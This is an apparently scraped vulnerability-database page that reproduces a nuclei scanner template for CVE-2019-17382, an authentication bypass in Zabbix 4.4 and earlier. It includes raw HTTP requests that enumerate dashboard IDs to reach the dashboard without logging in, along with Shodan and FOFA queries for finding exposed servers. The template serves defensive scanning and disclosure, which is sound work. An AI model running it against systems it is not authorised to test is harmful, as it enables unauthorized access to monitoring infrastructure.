Lucene search
K

Zabbix <=4.4 - Authentication Bypass

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 53 Views

Zabbix <=4.4 - Authentication Bypass via zabbix.ph

Related
Refs
Code
id: CVE-2019-17382

info:
  name: Zabbix <=4.4 - Authentication Bypass
  author: harshbothra_
  severity: critical
  description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Zabbix application.
  remediation: |
    Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47467
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17382
    - https://lists.debian.org/debian-lts-announce/2023/08/msg00027.html
    - https://github.com/huimzjty/vulwiki
    - https://github.com/merlinepedra25/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2019-17382
    cwe-id: CWE-639
    epss-score: 0.5415
    epss-percentile: 0.98882
    cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 100
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.favicon.hash:892542951
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve2019,cve,auth-bypass,login,edb,zabbix,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - /
        - /zabbix.php
        - /zabbix/zabbix.php

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(tolower(body), "<title>warning [refreshed every", "zabbix-logo", "content=\"zabbix sia")'
        internal: true

  - raw:
      - |
        GET {{path}}?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - /zabbix.php
        - /zabbix/zabbix.php
      ids: helpers/wordlists/numbers.txt
    attack: clusterbomb

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<title>Dashboard</title>"

      - type: status
        status:
          - 200
# digest: 490a0046304402201eb451d8f4e41f17b355b819c4ad2b8dcff00e25e4097a233a1b4634333214cc02201cc19b4dc56aad751e43303a29f4c5e9885370f3369ebb24e84074b47963d22e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 26.4
CVSS 3.19.1
EPSS0.5415
53